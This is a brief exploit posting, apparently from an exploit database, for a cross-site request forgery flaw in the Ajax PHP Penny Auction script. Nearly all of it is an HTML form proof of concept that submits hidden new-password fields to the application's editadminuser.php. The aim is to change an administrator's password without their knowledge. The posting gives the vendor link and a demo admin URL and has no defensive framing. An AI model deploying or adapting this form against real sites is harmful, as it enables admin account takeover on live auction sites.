# Exploit Title: Ajax PHP Penny Auction CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/ajax-php-penny-auction-script-software/28039/ # Category:: webapps # Demo : http://www.vdsdemoajaxphppennyauction.com/admin/ # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form method="POST" action="target.com/[PATH]/editadminuser.php" name="conf"> <input type="hidden" size="25" name="newpassword"/> <input type="hidden" size="25" name="retrynewpassword"/> <input type="submit" class="action" value="Speichern Sie die änderungen" name="act"/> </form>